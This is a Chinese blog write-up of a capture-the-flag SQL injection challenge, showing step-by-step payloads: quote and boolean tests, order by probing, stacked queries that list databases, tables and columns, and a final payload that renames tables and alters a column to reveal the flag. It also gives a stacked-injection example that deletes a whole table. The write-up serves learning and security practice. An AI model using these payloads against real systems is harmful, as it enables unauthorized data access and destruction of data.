1.0 打开页面

1567558465386

显然这个题的考点是注入,那我们来测一下

2.0 sql注入测试

1

1567558573721

2

1567558620510

输入 1' 后发现没有回显,改为 1' --+ 后,有回显,应该在这存在注入点

1567559536963

试一下 1' and 1=1 --+ 有一条回显

1567561534423

我们再改一下1' and 1=2 --+ 发现已经没有回显了

1567561570807

再试1' or 1=1 --+ 返回所有记录

1567561678879

正常sql注入流程order by走起,猜测为2个字段1' order by 2 --+

1567561798707

再测1' order by 3 --+他说没有字段3

1567561922516

既然测的字段有2个,联合查询union select 走起 1' union select 1, 2 --+

1567562071462

发现它把大部分的关键字过滤掉了,哦,有自己tcl,超出自己的知识范围了,所以找了一下dalao的wp,发现了新的知识堆叠注入,再此学习一波

3.0 堆叠注入

在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个
想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者
union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输
入:1; DELETE FROM products服务器端生成的sql语句为:(因未对输入的参数进行过
滤)Select * from products where productid=1;DELETE FROM products当执行查询后,第一
条显示查询信息,第二条则将整个表进行删除。

简单理解就是多条sql语句堆在一起执行,执行的语句类型没有限制

准备在写一篇堆叠注入当作笔记,记一下,现在大概知道了这个东西,就跟着wp试一下

试一下1'; show databases; --+ 看看效果,发现不仅查询1的记录,还进行的数据库的查询

1567563166591

在试一下数据表1'; show tables; --+发现数据表有2个

1567563260891

在试一下两张数据表里面都有什么字段'; show columns from words; --+

1567563561242

再试一下 0′;show columns from `1919810931114514`; –+ 发现我们想要的flag字段在表1919810931114514中

1567564704443

4.0 骚姿势–改名字

在这学到了,两个骚姿势,alertrename 既然它没有过滤这两个关键字,那是不是可以给表改名啊

  1. 先把words -> word1
  2. 再把1919810931114514 -> words
  3. 最后把1919810931114514表中的flag字段改为id

payload: 1′;RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;alter table `words` change `flag` `id` varchar(100) character set utf8 collate utf8_general_ci not null;show columns from words;–+

1567566611156

再用1' or 1=1 --+查看发现flag

1567566659419

版权声明:本文为lived-hu原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/lived-hu/p/11496587.html